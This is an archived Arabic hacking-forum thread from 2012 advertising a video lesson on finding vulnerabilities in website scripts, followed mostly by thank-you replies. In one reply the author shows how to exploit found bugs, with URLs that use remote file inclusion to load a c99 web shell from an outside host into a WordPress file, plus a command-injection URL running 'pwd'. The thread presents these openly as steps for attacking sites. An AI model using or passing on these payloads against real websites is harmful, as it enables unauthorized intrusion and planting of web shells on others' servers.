المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : |ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات



QtRoNiX FoX
07-12-2012, 11:59 PM
السلام عليكم ورحمة الله وبركاتة
بسم الله الرحمن الرحيم
الصلاة والسلام على اشرف المرسلين وخاتم الانبياء سيدنا محمد


درس اليوم هو شرح لكيفية فحص السكربتات من الثغرات,
فحص سكربت موقع الهدف , وفي حال لم يتم التعرف على سكربت موقع الهدف سيتم فحص سكربتات السيرفر
وكل هذا طبعا تم شرحة بالدرس ,طريقة معرفة سكربت موقع الهدف وكذلك سكربتات مواقع السيرفر...الخ
وتم شرح على اكثر من طريقة لفحص السكربتات

على كل حالـ.. وقبل تحميل الدرس

ما هو السكربت ؟؟
باختصار..
السكربت هو نص برمجي مبرمج بعدة لغات مثل: php & asp & ...الخ
وصمم لكي يسهل على مدراء المواقع استخدام الموقع والتحكم بة بسهولة وعدم وجود صعوبات كثيرة ..
وكذلك لترتيب مواضيع الموقع على حسب تقسيم السكربت، فكل سكربت له تقسيم خاصه فيه بالطبع وكل سكربت يختلف عن السكربت الثاني بكل تأكيد.

تماامـ..

لتحميل الدرس من هنا..
http://www.mediafire.com/?3qa6dcncy7kkh2h


حجم الدرس قبل فك الضغط: 12 MB
بعد فك الضغط: 23 MB
وقت الفيديو: 25 دقيقه



اتمنى انه قد كان شرح واضع ومفهوم للجميع..
ولا تنسو من صالح دعائكم..

تحياتي..
اخوكم QtRoNiX FoX

Z3r0-c00l
07-13-2012, 12:30 AM
مشكوووور اخي يشرفني اكون اول من يرد على الدرس
تقبل مروري ياغالي

Z3r0-c00l
07-13-2012, 12:31 AM
مشكوووور اخي يشرفني اكون اول من يرد على الدرس
تقبل مروري ياغالي

اخلاقي تاج راسي
07-13-2012, 09:22 AM
ما شاء الله تباركـ الله
بطل كعادتكـ
ياربي من جد كنت اتعب نفسي
انزل السكربت وروح لي ملف ملف
وابحث عن طريق المفكرة
لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي :tongue:
هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات
اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe
ربي يعطيكــ
بنتظار الدرس القادم .
تحياتي .

QtRoNiX FoX
07-13-2012, 01:07 PM
مشكوووور اخي يشرفني اكون اول من يرد على الدرس
تقبل مروري ياغالي
هلا فيك حبيبي
بالتوفيق..


ما شاء الله تباركـ الله
بطل كعادتكـ
ياربي من جد كنت اتعب نفسي
انزل السكربت وروح لي ملف ملف
وابحث عن طريق المفكرة
لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي :tongue:
هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات
اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe
ربي يعطيكــ
بنتظار الدرس القادم .
تحياتي .

نورت اخوي 'اخلاقي'
شوف يالغالي..
بخصوص انك بعد ما تلاقي خطأء وتجيلك مشكلة انك كيف تعرف مسار الثغرة عشان تطبقها على الموقع..
هاي سهله جدا, يعني لنفترض انك حملت سكربت وورد برسس عشان تفحصه يدوي على طريقتك انتي(اليدوية), ولنفترض كمان انك وجدت ثغرة داخل ملف wp-settings مثلاا..
وهذا ملف الـwp-settings موجود على الرئيسيه في سكربت وورد برسس ولنفترض كمان انه الموقع مركب السكربت على الرئيسيه مش داخل مجلدات واذا بدك تدخل مثلا على لوحة التحكم تدخل هكذا
www.site.com/wp-login.php
وكمان نفس الشي اذا بدك تستعرض ملف wp-settings رح يكون الاستعراض هكذا
www.site.com/wp-settings.php
وكمان لنفترض انه الدالات المصابه هني على سبيل المثال: qx ودالة اخرى اسمها aljyyosh ونوع الثغرة لنفترض كمان انها ثغرة الفايل انكلود File Include وثغرة الفايل انكلود لازم يكون معك شل بصيغة txt مرفوع موقع عادي
الاستغلال راح يكون هيك:
www.site.com/wp-settings.php?qx=http://c99.gen.tr/c99.txt?
http://c99.gen.tr/c99.txt? :: هذا الشل الي بصيغة تكست
وكمان بنفع يكون الاستغلال هيك:
www.site.com/wp-settings.php?aljyyosh=http://c99.gen.tr/c99.txt?

ونفس الشي اذا كانت الثغرة موجوده داخل مجلد او مجلدات., مثلا داخل هذا المسار wp-content\themes\twentyten والملف المصاب archive مثلا.. والدالة المصابة qx, ونوع الثغرة الكوماند,, الاستغلال رح يكون هيك
www.site.com/wp-content/themes/twentyten/archive.php?qx=pwd
pwd :: امر من وامر الينكس يعرض لك مسارك على السيرفر

بالتوفيق لك اخوي..

SNAKE-MAN
07-18-2012, 07:25 PM
مشكووور اخي وبانتظار جديدك يا مبدع :cool:

هكر فاضي
08-14-2012, 04:59 AM
مشكور أخي الكريم يعطيك العافية وبأنتظار المزيد :)

dark haCk
08-29-2012, 11:32 AM
ماهي غريبة عليك لانك مميز ومبدع بمعنى الكلمة الله لايحرمنا منك يارب

tfather71
09-21-2012, 06:59 PM
شكراً يا غالي

salahuiste
09-23-2012, 07:07 PM
مشكوووووووووور